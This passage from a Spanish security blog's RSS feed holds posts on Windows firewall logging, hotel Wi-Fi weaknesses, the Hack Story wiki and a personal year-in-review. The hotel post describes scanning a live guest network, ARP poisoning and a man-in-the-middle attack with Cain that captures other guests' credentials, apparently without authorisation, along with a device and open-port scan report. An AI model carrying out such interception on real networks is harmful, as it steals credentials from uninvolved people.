<p>Aunque puede que cada pefil debería d estar configurado de una manera especial, creo que es bueno configurar el Firewall lo mas restringivo posible en todas las áreas, siendo así una medida de mitigación contra posibles ataques del exterior.</p>
<p>En el apartado de inicio de sesión:</p>
<p><img class="aligncenter" src="http://img18.imageshack.us/img18/5149/saveh.png" alt="" width="413" height="459" /></p>
<p>Para cada uno de estos dominios, hemos de activar que registre los paquetes descartados y correctos. El log se guarda por defecto en:</p>
<blockquote><p>/Windows/System32/LogFiles/Firewall/pfirewall.log</p></blockquote>
<p>Como trabajo mucho con Cygwin, con un simple tail, podríamos ir viendo como se van registrando los paquetes:</p>
<blockquote><p>#!/bin/bash</p>
<p>#Shell que hace un tail de las conexiones del Firewall</p>
<p>tail -f /cygdrive/c/Windows/System32/LogFiles/Firewall/pfirewall.log</p></blockquote>
<p>Una utilidad mas por si hay alguien que queire probarlo <img src='http://s1.wp.com/wp-includes/images/smilies/icon_wink.gif' alt=';)' class='wp-smiley' /> </p>
<p>&nbsp;</p>
<p>&nbsp;</p>
<p>&nbsp;</p>
<br />Filed under: <a href='http://seifreed.com/category/seguridad/'>Seguridad</a>, <a href='http://seifreed.com/category/sistemas-operativos/windows-sistemas-operativos/'>Windows</a> Tagged: <a href='http://seifreed.com/tag/console2/'>Console2</a>, <a href='http://seifreed.com/tag/cygwin/'>Cygwin</a>, <a href='http://seifreed.com/tag/windows/'>windows</a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gocomments/seifreed.wordpress.com/4031/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/comments/seifreed.wordpress.com/4031/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godelicious/seifreed.wordpress.com/4031/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/delicious/seifreed.wordpress.com/4031/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gofacebook/seifreed.wordpress.com/4031/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/facebook/seifreed.wordpress.com/4031/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gotwitter/seifreed.wordpress.com/4031/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/twitter/seifreed.wordpress.com/4031/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gostumble/seifreed.wordpress.com/4031/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/stumble/seifreed.wordpress.com/4031/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godigg/seifreed.wordpress.com/4031/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/digg/seifreed.wordpress.com/4031/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/goreddit/seifreed.wordpress.com/4031/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/reddit/seifreed.wordpress.com/4031/" /></a> <img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=seifreed.com&amp;blog=1473574&amp;post=4031&amp;subd=seifreed&amp;ref=&amp;feed=1" width="1" height="1" />]]></content:encoded>
			<wfw:commentRss>http://seifreed.com/2012/01/13/firewall-windows-7-y-cygwin/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		<georss:point>0.000000 0.000000</georss:point>
		<geo:lat>0.000000</geo:lat>
		<geo:long>0.000000</geo:long>
		<media:content url="http://1.gravatar.com/avatar/1e239b704116f53f06c340ef742d14a0?s=96&#38;d=wavatar&#38;r=G" medium="image">
			<media:title type="html">seifreed</media:title>
		</media:content>

		<media:content url="http://img339.imageshack.us/img339/9411/firewallgeneral.png" medium="image" />

		<media:content url="http://img839.imageshack.us/img839/8476/iniciogk.png" medium="image" />

		<media:content url="http://img18.imageshack.us/img18/5149/saveh.png" medium="image" />
	</item>
		<item>
		<title>Jugando con la Wireless de los hoteles</title>
		<link>http://seifreed.com/2012/01/03/jugando-con-la-wireless-de-los-hoteles/</link>
		<comments>http://seifreed.com/2012/01/03/jugando-con-la-wireless-de-los-hoteles/#comments</comments>
		<pubDate>Tue, 03 Jan 2012 06:00:51 +0000</pubDate>
		<dc:creator>Marc Rivero López</dc:creator>
				<category><![CDATA[Seguridad]]></category>
		<category><![CDATA[cain]]></category>
		<category><![CDATA[redes wireless]]></category>
		<category><![CDATA[wireshark]]></category>

		<guid isPermaLink="false">http://seifreed.com/?p=4020</guid>
		<description><![CDATA[Hola! Muy buenas a todos/as! Desde siempre las redes Wireless han sido un foco para los atacantes. Las redes Wireless desde siempre han sufrido ataques desde que se implementaron en el mercado. Si recordamos primero, primero las redes Wireless surgieron abiertas, la gente empezó a quejarse y entonces mejoraron la seguridad a WEP, esto al [...]<img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=seifreed.com&amp;blog=1473574&amp;post=4020&amp;subd=seifreed&amp;ref=&amp;feed=1" width="1" height="1" />]]></description>
			<content:encoded><![CDATA[<p>Hola!</p>
<p>Muy buenas a todos/as!</p>
<p>Desde siempre las redes Wireless han sido un foco para los atacantes. Las redes Wireless desde siempre han sufrido ataques desde que se implementaron en el mercado. Si recordamos primero, primero las redes Wireless surgieron abiertas, la gente empezó a quejarse y entonces mejoraron la seguridad a WEP, esto al principio fue una medida de mitigación pero pronto empezaron a surgir los primeros ataques contra redes inalámbricas, un ejemplo de un posible ataque que podía afectar a las redes era el de <a href="http://seifreed.com/2009/12/23/auditoria-wireless-con-wisacom-ws-hp-800-en-ubuntu-9-10-claves-wep/">inyección, del que ya hablé aquí</a>, otro ataque que tambiñen podía romper redes Wireless mucho más rápido era el <a href="http://seifreed.com/2010/01/21/auditoria-wireless-con-wisacom-ws-hp-800-en-ubuntu-9-10-ataque-chop-chop/">ataque Chop Chop, que también expliqué por aquí</a>.</p>
<p>Mas tarde surgió el protocolo WPA y WPA2 que consiguieron mitigar en gran parte los ataques a este tipo de infraestructuras.</p>
<p>En cada vez mas servicios que se ofrecen al público, tanto en cafeterías como en Hoteles, como en centros comerciales ofrecen servicio de Wireless o bien gratuíto, o bien de pago.</p>
<p>Estos servicios deberían de cumplir unos requisitos mínimos, por ejemplo, que si existe dos redes Wireless en el hotel, una de invitados y otra para los ya inscritos fueran por VLAN&#8217;s diferentes.</p>
<p>Otro de los requisitos es que exista isolation entre clientes en la misma red, es decir, que no pueda ver quien está conectado ni poder capturar con mi tarjeta en modo promiscuo los datos que navegan a través de la red.</p>
<p>También sería normal que si NO estamos autenticados en la red, no tengamos la visibilidad de los demás clientes conectados.</p>
<p>Una vez conectados a la red, por ejempo, con Cain hacemos un escaneo de los hosts de la red.</p>
<p><img class="aligncenter" src="http://img818.imageshack.us/img818/8922/scanmac.png" alt="" width="507" height="538" /></p>
<p>Parece ser que tenemos acceso a ver los clientes conectados en la red, ahora mismo está sin autenticar es decir, no está bien configurada la red.</p>
<p>Un ataque posible sería realizar un <a href="http://seifreed.com/2011/06/07/man-in-the-middle-con-cain-y-abel/">MITM, con Cain es muy fácil, también expliqué por aquí como se hacía</a></p>
<p><img class="aligncenter" src="http://img577.imageshack.us/img577/663/posinoningabel.png" alt="" width="773" height="456" /></p>
<p>Haciendo el ataque de Poisoning podemos robar credenciales, por ejemplo:</p>
<p><img src="http://img59.imageshack.us/img59/7308/passwordscain.png" alt="" width="800" height="154" /></p>
<p>Se pueden capturar las contraseñas haciendo un ataque Man in the middle</p>
<p>Si guardamos un pcap de la red, podemos consultar mucho mejor los datos extraídos.</p>
<p>Con NetworkMinner podemos ver los datos mas ordenados</p>
<p><img class="aligncenter" src="http://img195.imageshack.us/img195/3949/networkminner.png" alt="" width="752" height="542" /></p>
<p>Por último y debido a que ya con un Smartphone podemos auditar una red con <a href="http://www.zimperium.com/anti.html">ANTI para Android </a>pude sacar este report</p>
<p>Los resultados són:</p>
<blockquote><p>39 devices found on 192.168.1.36/24 network:</p>
<p>1. IP=10.1.1.1, MAC=[XX:XX:XX:XX:XX:XX], Type=Unknown Device     No opened ports found!</p>
<p>2. IP=10.1.1.3, MAC=[XX:XX:XX:XX:XX:XX], Type=Router Device     1 Open Ports:     [80/http] &#8211; Make sure you&#8217;re using latest HTTP Server.</p>
<p>3. IP=10.1.1.15, MAC=[XX:XX:XX:XX:XX:XX], Type=Unknown Device     4 Open Ports:     [22/ssh] &#8211; Make sure running SSH on this device is needed. Use strong passwords!     [23/telnet] &#8211; Opened port found.     [80/http] &#8211; Make sure you&#8217;re using latest HTTP Server.     [443/https] &#8211; Opened port found.</p>
<p>4. IP=10.1.1.21, MAC=[XX:XX:XX:XX:XX:XX], Type=Linux Device     1 Open Ports:     [80/http] &#8211; Make sure you&#8217;re using latest HTTP Server.</p>
<p>5. IP=10.1.1.22, MAC=[XX:XX:XX:XX:XX:XX], Type=Linux Device     1 Open Ports:     [80/http] &#8211; Make sure you&#8217;re using latest HTTP Server.</p>
<p>6. IP=10.1.1.23, MAC=[XX:XX:XX:XX:XX:XX], Type=Linux Device     1 Open Ports:     [80/http] &#8211; Make sure you&#8217;re using latest HTTP Server.</p>
<p>7. IP=10.1.1.24, MAC=[XX:XX:XX:XX:XX:XX], Type=Router Device     1 Open Ports:     [80/http] &#8211; Make sure you&#8217;re using latest HTTP Server.</p>
<p>8. IP=10.1.1.25, MAC=[XX:XX:XX:XX:XX:XX], Type=Unknown Device     4 Open Ports:     [22/ssh] &#8211; Make sure running SSH on this device is needed. Use strong passwords!     [23/telnet] &#8211; Opened port found.     [80/http] &#8211; Make sure you&#8217;re using latest HTTP Server.     [443/https] &#8211; Opened port found.</p>
<p>9. IP=10.1.1.35, MAC=[XX:XX:XX:XX:XX:XX], Type=Unknown Device     4 Open Ports:     [22/ssh] &#8211; Make sure running SSH on this device is needed. Use strong passwords!     [23/telnet] &#8211; Opened port found.     [80/http] &#8211; Make sure you&#8217;re using latest HTTP Server.     [443/https] &#8211; Opened port found.</p>
<p>10. IP=10.1.1.41, MAC=[XX:XX:XX:XX:XX:XX], Type=Unknown Device     4 Open Ports:     [22/ssh] &#8211; Make sure running SSH on this device is needed. Use strong passwords!     [23/telnet] &#8211; Opened port found.     [80/http] &#8211; Make sure you&#8217;re using latest HTTP Server.     [443/https] &#8211; Opened port found.</p>
<p>11. IP=10.1.1.42, MAC=[XX:XX:XX:XX:XX:XX], Type=Unknown Device     4 Open Ports:     [22/ssh] &#8211; Make sure running SSH on this device is needed. Use strong passwords!     [23/telnet] &#8211; Opened port found.     [80/http] &#8211; Make sure you&#8217;re using latest HTTP Server.     [443/https] &#8211; Opened port found.</p>
<p>12. IP=10.1.1.45, MAC=[XX:XX:XX:XX:XX:XX], Type=Unknown Device     4 Open Ports:     [22/ssh] &#8211; Make sure running SSH on this device is needed. Use strong passwords!     [23/telnet] &#8211; Opened port found.     [80/http] &#8211; Make sure you&#8217;re using latest HTTP Server.     [443/https] &#8211; Opened port found.</p>
<p>13. IP=10.1.1.51, MAC=[XX:XX:XX:XX:XX:XX], Type=Linux Device     1 Open Ports:     [80/http] &#8211; Make sure you&#8217;re using latest HTTP Server.</p>
<p>14. IP=10.1.1.52, MAC=[00:11:22:33:44:55], Type=Linux Device     1 Open Ports:     [80/http] &#8211; Make sure you&#8217;re using latest HTTP Server.</p>
<p>15. IP=10.1.1.53, MAC=[XX:XX:XX:XX:XX:XX], Type=Router Device     1 Open Ports:     [80/http] &#8211; Make sure you&#8217;re using latest HTTP Server.</p>
<p>16. IP=10.1.1.55, MAC=[XX:XX:XX:XX:XX:XX], Type=Unknown Device     4 Open Ports:     [22/ssh] &#8211; Make sure running SSH on this device is needed. Use strong passwords!     [23/telnet] &#8211; Opened port found.     [80/http] &#8211; Make sure you&#8217;re using latest HTTP Server.     [443/https] &#8211; Opened port found.</p>
<p>17. IP=10.1.1.62, MAC=[XX:XX:XX:XX:XX:XX], Type=Router Device     1 Open Ports:     [80/http] &#8211; Make sure you&#8217;re using latest HTTP Server.</p>
<p>18. IP=10.1.1.63, MAC=[XX:XX:XX:XX:XX:XX], Type=Router Device     1 Open Ports:     [80/http] &#8211; Make sure you&#8217;re using latest HTTP Server.</p>
<p>19. IP=10.1.1.71, MAC=[00:11:22:33:44:55], Type=Router Device     1 Open Ports:     [80/http] &#8211; Make sure you&#8217;re using latest HTTP Server.</p>
<p>20. IP=10.1.1.72, MAC=[XX:XX:XX:XX:XX:XX], Type=Router Device     1 Open Ports:     [80/http] &#8211; Make sure you&#8217;re using latest HTTP Server.</p>
<p>21. IP=10.1.1.75, MAC=[XX:XX:XX:XX:XX:XX], Type=Unknown Device     4 Open Ports:     [22/ssh] &#8211; Make sure running SSH on this device is needed. Use strong passwords!     [23/telnet] &#8211; Opened port found.     [80/http] &#8211; Make sure you&#8217;re using latest HTTP Server.     [443/https] &#8211; Opened port found.</p>
<p>22. IP=10.1.1.81, MAC=[XX:XX:XX:XX:XX:XX], Type=Router Device     1 Open Ports:     [80/http] &#8211; Make sure you&#8217;re using latest HTTP Server.</p>
<p>23. IP=10.1.1.82, MAC=[XX:XX:XX:XX:XX:XX], Type=Router Device     1 Open Ports:     [80/http] &#8211; Make sure you&#8217;re using latest HTTP Server.</p>
<p>24. IP=10.1.1.95, MAC=[XX:XX:XX:XX:XX:XX], Type=Unknown Device     4 Open Ports:     [22/ssh] &#8211; Make sure running SSH on this device is needed. Use strong passwords!     [23/telnet] &#8211; Opened port found.     [80/http] &#8211; Make sure you&#8217;re using latest HTTP Server.     [443/https] &#8211; Opened port found.</p>
<p>25. IP=10.1.1.98, MAC=[XX:XX:XX:XX:XX:XX], Type=Windows Desktop     10 Open Ports:     [135/msrpc] &#8211; Opened port found.     [139/netbios-ssn] &#8211; Opened port found.     [445/microsoft-ds] &#8211; Recommended to block this port in firewall. Start-&gt;Run-&gt;firewall.cpl. Important tip : Run Windows update!     [5800/vnc-http] &#8211; Opened port found.     [5900/vnc] &#8211; Opened port found.     [49152/unknown] &#8211; Opened port found.     [49153/unknown] &#8211; Opened port found.     [49154/unknown] &#8211; Opened port found.     [49155/unknown] &#8211; Opened port found.     [49157/unknown] &#8211; Opened port found.</p>
<p>26. IP=10.1.1.103, MAC=[XX:XX:XX:XX:XX:XX], Type=Windows Desktop     1 Open Ports:     [5357/wsdapi] &#8211; Opened port found.</p>
<p>27. IP=10.1.1.107, MAC=[XX:XX:XX:XX:XX:XX], Type=Unknown Device     No opened ports found!</p>
<p>28. IP=10.1.1.114, MAC=[XX:XX:XX:XX:XX:XX], Type=Unknown Device     No opened ports found!</p>
<p>29. IP=10.1.1.116, MAC=[XX:XX:XX:XX:XX:XX], Type=Mac/OSX Desktop     No opened ports found!</p>
<p>30. IP=10.1.1.130, MAC=[XX:XX:XX:XX:XX:XX], Type=Unknown Device     No opened ports found!</p>
<p>31. IP=10.1.1.132, MAC=[XX:XX:XX:XX:XX:XX], Type=Unknown Device     No opened ports found!</p>
<p>32. IP=10.1.1.139, MAC=[XX:XX:XX:XX:XX:XX], Type=Unknown Device     No opened ports found!</p>
<p>33. IP=10.1.1.144, MAC=[XX:XX:XX:XX:XX:XX], Type=Mac/OSX Desktop     No opened ports found!</p>
<p>34. IP=10.1.1.164, MAC=[XX:XX:XX:XX:XX:XX], Type=Unknown Device     No opened ports found!</p>
<p>35. IP=10.1.1.170, MAC=[XX:XX:XX:XX:XX:XX], Type=Unknown Device     1 Open Ports:     [8080/http-proxy] &#8211; Opened port found.</p>
<p>36. IP=10.1.1.181, MAC=[XX:XX:XX:XX:XX:XX], Type=Unknown Device     No opened ports found!</p>
<p>37. IP=10.1.1.183, MAC=[XX:XX:XX:XX:XX:XX], Type=Linux Device     No opened ports found!</p>
<p>38. IP=10.1.1.191, MAC=[XX:XX:XX:XX:XX:XX], Type=Windows Desktop     4 Open Ports:     [443/https] &#8211; Opened port found.     [990/ftps] &#8211; Opened port found.     [993/imaps] &#8211; Opened port found.     [995/pop3s] &#8211; Opened port found.</p>
<p>39. IP=10.1.1.194, MAC=[XX:XX:XX:XX:XX:XX], Type=Mac/OSX Desktop     No opened ports found!</p></blockquote>
<p>Hay ordenadores bastante interesantes con bastantes puertos, que podrían dar mucho juego&#8230;</p>
<p>Aunque basta ya de jugar, la gente querrá consultar su correo <img src='http://s1.wp.com/wp-includes/images/smilies/icon_wink.gif' alt=';)' class='wp-smiley' /> </p>
<br />Filed under: <a href='http://seifreed.com/category/seguridad/'>Seguridad</a> Tagged: <a href='http://seifreed.com/tag/cain/'>cain</a>, <a href='http://seifreed.com/tag/redes-wireless/'>redes wireless</a>, <a href='http://seifreed.com/tag/wireshark/'>wireshark</a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gocomments/seifreed.wordpress.com/4020/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/comments/seifreed.wordpress.com/4020/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godelicious/seifreed.wordpress.com/4020/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/delicious/seifreed.wordpress.com/4020/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gofacebook/seifreed.wordpress.com/4020/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/facebook/seifreed.wordpress.com/4020/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gotwitter/seifreed.wordpress.com/4020/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/twitter/seifreed.wordpress.com/4020/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gostumble/seifreed.wordpress.com/4020/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/stumble/seifreed.wordpress.com/4020/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godigg/seifreed.wordpress.com/4020/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/digg/seifreed.wordpress.com/4020/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/goreddit/seifreed.wordpress.com/4020/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/reddit/seifreed.wordpress.com/4020/" /></a> <img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=seifreed.com&amp;blog=1473574&amp;post=4020&amp;subd=seifreed&amp;ref=&amp;feed=1" width="1" height="1" />]]></content:encoded>
			<wfw:commentRss>http://seifreed.com/2012/01/03/jugando-con-la-wireless-de-los-hoteles/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		<georss:point>0.000000 0.000000</georss:point>
		<geo:lat>0.000000</geo:lat>
		<geo:long>0.000000</geo:long>
		<media:content url="http://1.gravatar.com/avatar/1e239b704116f53f06c340ef742d14a0?s=96&#38;d=wavatar&#38;r=G" medium="image">
			<media:title type="html">seifreed</media:title>
		</media:content>

		<media:content url="http://img818.imageshack.us/img818/8922/scanmac.png" medium="image" />

		<media:content url="http://img577.imageshack.us/img577/663/posinoningabel.png" medium="image" />

		<media:content url="http://img59.imageshack.us/img59/7308/passwordscain.png" medium="image" />

		<media:content url="http://img195.imageshack.us/img195/3949/networkminner.png" medium="image" />
	</item>
		<item>
		<title>Hack Story</title>
		<link>http://seifreed.com/2012/01/02/hack-story/</link>
		<comments>http://seifreed.com/2012/01/02/hack-story/#comments</comments>
		<pubDate>Mon, 02 Jan 2012 06:00:15 +0000</pubDate>
		<dc:creator>Marc Rivero López</dc:creator>
				<category><![CDATA[Seguridad]]></category>
		<category><![CDATA[Hack Story]]></category>
		<category><![CDATA[hackers]]></category>
		<category><![CDATA[hacking]]></category>

		<guid isPermaLink="false">http://seifreed.com/?p=4017</guid>
		<description><![CDATA[Hola! Muy buenas a todos/as! No podía dejar de poner en este blog la web de Hack Story un proyecto que administra la ya conocida en la red Merce Molist. Así que empezamos el &#8220;primer día&#8221; laborable en la que os recomiendo esta web. Hack Story nace en verano de 2008 en Barcelona. Es un [...]<img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=seifreed.com&amp;blog=1473574&amp;post=4017&amp;subd=seifreed&amp;ref=&amp;feed=1" width="1" height="1" />]]></description>
			<content:encoded><![CDATA[<p>Hola!</p>
<p>Muy buenas a todos/as!</p>
<p>No podía dejar de poner en este blog la web de Hack Story un proyecto que administra la ya conocida en la red <a href="http://twitter.com/mercemolist">Merce Molist</a>.</p>
<p>Así que empezamos el &#8220;primer día&#8221; laborable en la que os recomiendo esta web.</p>
<p>Hack Story nace en verano de 2008 en Barcelona. Es un proyecto vivo de recuperación de la historia de la comunidad hacker.</p>
<p>Os copio y pego la definición del about:</p>
<blockquote><p><strong>Hack Story</strong> nace en verano de 2008 en Barcelona. Es un proyecto vivo de recuperación de la historia de la comunidad hacker.</p>
<p>Actualmente abarca la comunidad hacker hispana, aunque tiene vocación planetaria, de ahí el uso del inglés en los principales parámetros, categorías y textos de presentación. El contenido, en cambio, se escribe en el idioma de sus protagonistas. Otras lenguas, espacios y tiempos son bienvenidos.</p>
<p><strong>Hack Story</strong> se manifiesta en la red a través de una plataforma wiki, para que cualquiera pueda corregir errores o añadir datos (debido a recientes bombardeos de &#8220;spam&#8221;, hemos moderado la introducción de nueva información en el wiki, así como la creación de nuev@os usuari@s).</p>
<p><a title="User:Merce" href="Merce">Mercè Molist</a> es la administradora del wiki en lo que a contenidos se refiere. <a title="User:Xavi" href="Xavi">Xavi Caballé</a> aportó desinteresadamente el alojamiento en sus inicios y Alfonso, la personalización del wiki y ayuda técnica. Gracias a <a href="http://www.harkoblog.com/" rel="nofollow">Harko</a> por el apoyo gráfico y a <a href="http://blackhold.nusepas.com/" rel="nofollow">Blackhold</a> por actualizar el software, ambos de forma voluntaria. Actualmente la Hackstory tiene alojamiento y servicio técnico gratuitos en <a href="http://www.nonfqdn.net" rel="nofollow">NONFQDN</a>. ¡Gracias!</p>
<p><strong>Hack Story</strong> está sujeta a su <a title="Hack Story:Policy" href="Policy">propia política</a>, a la <a title="Ética hacker es" href="/index.php/%C3%89tica_hacker_es">ética hacker</a> y a las leyes vigentes, por este orden</p></blockquote>
<p>Os adjunto un pantallazo del Hack Story</p>
<p><img class="aligncenter" src="http://img689.imageshack.us/img689/5340/hackstory.png" alt="" width="800" height="396" /></p>
<p>Os animo a pasaros por esta Wiki a aprender mas sobre los Hackers <img src='http://s1.wp.com/wp-includes/images/smilies/icon_wink.gif' alt=';)' class='wp-smiley' /> </p>
<p>&nbsp;</p>
<p>Saludos</p>
<br />Filed under: <a href='http://seifreed.com/category/seguridad/'>Seguridad</a> Tagged: <a href='http://seifreed.com/tag/hack-story/'>Hack Story</a>, <a href='http://seifreed.com/tag/hackers/'>hackers</a>, <a href='http://seifreed.com/tag/hacking/'>hacking</a>, <a href='http://seifreed.com/tag/seguridad/'>Seguridad</a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gocomments/seifreed.wordpress.com/4017/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/comments/seifreed.wordpress.com/4017/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godelicious/seifreed.wordpress.com/4017/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/delicious/seifreed.wordpress.com/4017/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gofacebook/seifreed.wordpress.com/4017/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/facebook/seifreed.wordpress.com/4017/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gotwitter/seifreed.wordpress.com/4017/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/twitter/seifreed.wordpress.com/4017/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gostumble/seifreed.wordpress.com/4017/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/stumble/seifreed.wordpress.com/4017/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godigg/seifreed.wordpress.com/4017/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/digg/seifreed.wordpress.com/4017/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/goreddit/seifreed.wordpress.com/4017/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/reddit/seifreed.wordpress.com/4017/" /></a> <img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=seifreed.com&amp;blog=1473574&amp;post=4017&amp;subd=seifreed&amp;ref=&amp;feed=1" width="1" height="1" />]]></content:encoded>
			<wfw:commentRss>http://seifreed.com/2012/01/02/hack-story/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		<georss:point>0.000000 0.000000</georss:point>
		<geo:lat>0.000000</geo:lat>
		<geo:long>0.000000</geo:long>
		<media:content url="http://1.gravatar.com/avatar/1e239b704116f53f06c340ef742d14a0?s=96&#38;d=wavatar&#38;r=G" medium="image">
			<media:title type="html">seifreed</media:title>
		</media:content>

		<media:content url="http://img689.imageshack.us/img689/5340/hackstory.png" medium="image" />
	</item>
		<item>
		<title>Y&#8230; empieza otro año, 2012 ya está aquí!</title>
		<link>http://seifreed.com/2012/01/01/y-empieza-otro-ano-2012-ya-esta-aqui/</link>
		<comments>http://seifreed.com/2012/01/01/y-empieza-otro-ano-2012-ya-esta-aqui/#comments</comments>
		<pubDate>Sun, 01 Jan 2012 21:14:11 +0000</pubDate>
		<dc:creator>Marc Rivero López</dc:creator>
				<category><![CDATA[Personal]]></category>
		<category><![CDATA[Seguridad]]></category>
		<category><![CDATA[2011 2012]]></category>
		<category><![CDATA[marc]]></category>

		<guid isPermaLink="false">http://seifreed.com/?p=4015</guid>
		<description><![CDATA[Hola! Muy buenas a todos/as! &#160; Después de estas fiestas navideñas, reuniones familiares, cenas y quedadas con amigos, el disfrute con la comida y bebida, se acaban mis vacaciones. Y es que, después de no haberlas echo este año, la verdad es que me han sentado muy bien, y muchas ganas de volver mañana no [...]<img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=seifreed.com&amp;blog=1473574&amp;post=4015&amp;subd=seifreed&amp;ref=&amp;feed=1" width="1" height="1" />]]></description>
			<content:encoded><![CDATA[<p>Hola!</p>
<p>Muy buenas a todos/as!</p>
<p>&nbsp;</p>
<p>Después de estas fiestas navideñas, reuniones familiares, cenas y quedadas con amigos, el disfrute con la comida y bebida, se acaban mis vacaciones. Y es que, después de no haberlas echo este año, la verdad es que me han sentado muy bien, y muchas ganas de volver mañana no se tienen.</p>
<p>Este año ha estado sujeto a bastantes cambios, tanto en lo personal como en lo profesional, y es que sobretodo en lo profesional ha dado un vuelco del que nunca me hubiera imaginado, a mejor claro.</p>
<p>Ahora por fin me puedo dedicar a una de las ramas que MAS me gustan y esa es, la Seguridad Informática.</p>
<p>El año 2010 lo empecé trabajando como Técnico Wireless en el mayorista <a href="http://wifisafe.com">Wifisafe Spain</a>. La verdad es que salía bastante quemado de mi anterior trabajo y empecé con mucha ilusión en este nuevo trabajo, del que, la verdad es que tenía muy poca experiencia. Estuve bastante tiempo afincado y muy cómodo y la verdad es que me dedicaba a aprovechar mi tiempo libre y demás. Ese año con <a href="http://twitter.com/jncastellano">Nicolas</a> estábamos preparando las conferencias de la <a href="http://noconname.org">No cON Name</a> en Barcelona. Era mi primera experiencia preparando unas conferencias de referencia en el sur de Europa. Pude conocer muchísima gente, hacer nuevos amigos, compartir experiencias, en resumen fue una experiencia muy agradable.</p>
<p>No me había definido e año 2010 ningún objetivo en concreto, iba investigando y publicando cosas en el blog que me parecían interesantes.</p>
<p>Después de ya llevar un tiempo trabajando en Mayorista decidí dar un cambio de profesión y ya orientarme a la seguridad, ya fuera como auditor, o bien como consultor. La oportunidad me llego, y pude cambiar a una consultora de seguridad donde además conocí a un máster como <a href="http://es.linkedin.com/in/ricardoportaserna">director técnico a Ricardo, un saludo desde aquí crack!</a></p>
<p>Por cosas que no vienen al caso, en esta consultora no me quedé mucho tiempo y es que me ficho una de las grandes, S21Sec.</p>
<p>La verdad es que había oído hablar mucho de ellos, y se que los que trabajaban ahí son referente en seguridad. Es una empresa que tiene muchos proyectos, en concreto no entré ni como consultor ni como auditor, sino, en el departamento de e-crime. Nunca había oído hablar de eso de e-crime, no sabía excactamente a que se dedicaban, pero ahora que llevo bastante tiempo, puedo decir que me encanta el departamento, las tareas que se desarrollan y la cantidad de cosas que he aprendido en muy poco tiempo. Y es que en esta empresa nunca te vas cada día sin aprender algo nuevo de tus compañeros, y es que a veces te sientes como una hormiga rodeada de gigantes.</p>
<p>Aprovecho para poder empaparme de todo y poder aprender lo máximo de todos ellos cada día sin excepción. El trabajo diario me gusta, los compañeros son geniales, además de que no me coge lejos de casa ¿Que mas le puedo pedir?</p>
<p>Este año 2011 mi vida profesional ha dado un cambio a mejor, a mucho mejor, y solo le deso a este nuevo año, consolidar lo ya conseguido este año anterior y seguir mejorando cada día mas.</p>
<p>Ya iréis viendo a que me dedico en mi trabajo, o que proyectos empiezo a nivel personal. Que no son pocos.</p>
<p>&nbsp;</p>
<p>Saludos.</p>
<br />Filed under: <a href='http://seifreed.com/category/personal/'>Personal</a>, <a href='http://seifreed.com/category/seguridad/'>Seguridad</a> Tagged: <a href='http://seifreed.com/tag/2011-2012/'>2011 2012</a>, <a href='http://seifreed.com/tag/marc/'>marc</a>, <a href='http://seifreed.com/tag/personal/'>Personal</a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gocomments/seifreed.wordpress.com/4015/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/comments/seifreed.wordpress.com/4015/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godelicious/seifreed.wordpress.com/4015/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/delicious/seifreed.wordpress.com/4015/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gofacebook/seifreed.wordpress.com/4015/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/facebook/seifreed.wordpress.com/4015/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gotwitter/seifreed.wordpress.com/4015/"><img alt="" border="0" 